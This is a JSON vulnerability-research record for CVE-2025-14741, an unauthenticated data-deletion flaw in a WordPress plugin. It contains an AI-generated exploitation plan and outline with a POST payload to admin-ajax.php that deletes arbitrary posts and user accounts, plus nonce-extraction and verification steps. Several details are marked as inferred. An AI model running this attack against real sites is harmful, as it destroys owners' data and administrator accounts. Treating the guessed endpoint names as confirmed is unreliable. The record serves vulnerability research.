[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsKoLV9Y7cWKfysK_ZWaECjYxMkbC9JnDW1A7RRJ13aE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2025-14741","frontend-admin-by-dynamiapps-missing-authorization-to-unauthenticated-arbitrary-data-deletion-via-delete-post-form-eleme","Frontend Admin by DynamiApps \u003C= 3.28.25 - Missing Authorization to Unauthenticated Arbitrary Data Deletion via 'delete post' Form Element","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to missing authorization to unauthorized data modification and deletion due to a missing capability check on the 'delete_object' function in all versions up to, and including, 3.28.25. This makes it possible for unauthenticated attackers to delete arbitrary posts, pages, products, taxonomy terms, and user accounts.","acf-frontend-form-element",null,"\u003C=3.28.25","3.28.26","critical",9.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Missing Authorization","2026-01-08 18:45:51","2026-01-09 07:22:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F53adbab6-953a-4a6f-bbfc-89efdbdd28e0?source=api-prod",1,[],"researched",false,3,"This research plan outlines the steps required to analyze and exploit **CVE-2025-14741**, a critical missing authorization vulnerability in the **Frontend Admin by DynamiApps** plugin.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Missing Authorization (Insecure Direct Object Reference \u002F Missing Capability Check).\n*   **Location:** The `delete_object` function (likely a method in an AJAX handler class).\n*   **Cause:** The plugin exposes functionality to delete WordPress objects (posts, users, terms) via frontend forms. While it may implement nonce checks, it fails to verify if the requesting user has the necessary permissions (`current_user_can()`) to delete the specified object. \n*   **Impact:** Unauthenticated attackers can delete any post, page, product, taxonomy term, or user account (including administrators), leading to full site disruption or data loss.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** Likely `acf_frontend\u002Fdelete_object` or `acf_frontend\u002Felement\u002Fdelete_object` (inferred from plugin naming conventions).\n*   **HTTP Method:** `POST`\n*   **Authentication:** None required (vulnerable via `wp_ajax_nopriv_*` hooks).\n*   **Key Parameters:**\n    *   `action`: The AJAX action string.\n    *   `object_id`: The ID of the target to delete (Post ID or User ID).\n    *   `object_type`: (e.g., `post`, `user`, `term`).\n    *   `nonce`: A security token (likely accessible on pages where the plugin is active).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers a `nopriv` AJAX handler:\n    `add_action( 'wp_ajax_nopriv_acf_frontend\u002Fdelete_object', array( $this, 'delete_object' ) );`\n2.  **Handler Execution:** The `delete_object` function is called.\n3.  **Missing Check:** The function likely calls `wp_verify_nonce()` but proceeds to call `wp_delete_post()` or `wp_delete_user()` without verifying `current_user_can( 'delete_post', $post_id )` or `current_user_can( 'delete_user', $user_id )`.\n4.  **Sink:** The core WordPress deletion functions are executed on the user-provided `object_id`.\n\n### 4. Nonce Acquisition Strategy\nThe Frontend Admin plugin localizes its configuration data to the frontend for its form elements.\n\n1.  **Identify Shortcode:** The plugin uses shortcodes like `[acf_frontend_form]` or specific element shortcodes to render forms.\n2.  **Setup Page:** Create a public page containing a Frontend Admin \"Delete Post\" element or a general form element.\n3.  **Navigate & Extract:**\n    *   Navigate to the created page.\n    *   The plugin localizes data in a global JavaScript object, usually `acf_frontend` or `acf_frontend_form`.\n    *   **JS Variable:** `window.acf_frontend` (inferred).\n    *   **Nonce Key:** `acf_frontend.nonce` or `acf_frontend.ajax_nonce` (inferred).\n4.  **Execution Agent Command:**\n    ```javascript\n    \u002F\u002F Using browser_eval to find the nonce\n    const nonce = window.acf_frontend?.nonce || window.acf_frontend_form?.nonce;\n    return nonce;\n    ```\n\n### 5. Exploitation Strategy\n#### Step 1: Target Identification\nIdentify the ID of an object to delete (e.g., Post ID 1 or User ID 1 for the admin).\n\n#### Step 2: HTTP Request Construction\nSend a POST request to `admin-ajax.php` using the `http_request` tool.\n\n*   **URL:** `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Payload:**\n    ```text\n    action=acf_frontend\u002Fdelete_object&object_id=TARGET_ID&object_type=user&nonce=EXTRACTED_NONCE\n    ```\n    *(Note: The exact action string and parameter names must be confirmed by searching the plugin source for `wp_ajax_nopriv`).*\n\n### 6. Test Data Setup\n1.  **Victim Post:** Create a post titled \"Sensitive Data\" and note its ID.\n2.  **Victim User:** Create a secondary administrator or editor user and note their ID.\n3.  **Trigger Page:**\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Form Page\" --post_content='[acf_frontend_form]'`\n    *   Alternatively, if the plugin requires a specific \"Delete\" element, use the plugin's UI to add a delete button to a page.\n\n### 7. Expected Results\n*   **Response:** The AJAX endpoint should return a success message (e.g., `{\"success\": true}` or a `1`).\n*   **State Change:** The target post or user should be permanently removed from the database (or moved to trash if `force_delete` is false).\n\n### 8. Verification Steps\n1.  **Post Deletion Check:** `wp post exists \u003CID>` should return false or show the post is in the trash.\n2.  **User Deletion Check:** `wp user list --id=\u003CID>` should return an empty list.\n3.  **Database Check:** `wp db query \"SELECT * FROM wp_posts WHERE ID = \u003CID>\"` to confirm record removal.\n\n### 9. Alternative Approaches\n*   **Parameter variations:** If `object_type` is not used, the plugin might use separate actions like `acf_frontend\u002Fdelete_post` and `acf_frontend\u002Fdelete_user`. \n*   **Form ID requirement:** Some handlers might require a `form_id` or `element_id` to validate which \"delete button\" configuration is being used. These can be extracted from the HTML attributes of the delete button on the trigger page (e.g., `data-form-id=\"...\"`).\n*   **Trash vs. Permanent:** Try adding `force=1` or `permanent=true` to the payload if the initial deletion only moves the object to the trash.","The Frontend Admin by DynamiApps plugin is vulnerable to unauthorized data deletion because it fails to perform capability checks in its 'delete_object' AJAX handler. Unauthenticated attackers can exploit this to delete arbitrary posts, pages, taxonomy terms, and even user accounts (including administrators) by providing a valid security nonce and object identifier.","1. Access a public page where a Frontend Admin form is rendered to locate the security nonce in the global JavaScript object (typically 'window.acf_frontend.nonce').\n2. Identify the 'object_id' and 'object_type' (e.g., 'post', 'user', or 'term') of the target to be deleted.\n3. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the following parameters: 'action=acf_frontend\u002Fdelete_object', 'object_id=[TARGET_ID]', 'object_type=[TYPE]', and 'nonce=[EXTRACTED_NONCE]'.\n4. The plugin will execute the deletion via core WordPress functions (like wp_delete_post or wp_delete_user) without verifying if the requester has the 'delete_post' or 'delete_users' capabilities.","gemini-3-flash-preview","2026-05-05 13:27:55","2026-05-05 13:29:43",{"type":32,"vulnerable_version":33,"fixed_version":11,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":36,"fixed_zip":37,"all_tags":38},"plugin","3.28.24","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.24","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.24.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.26","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.26.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags"]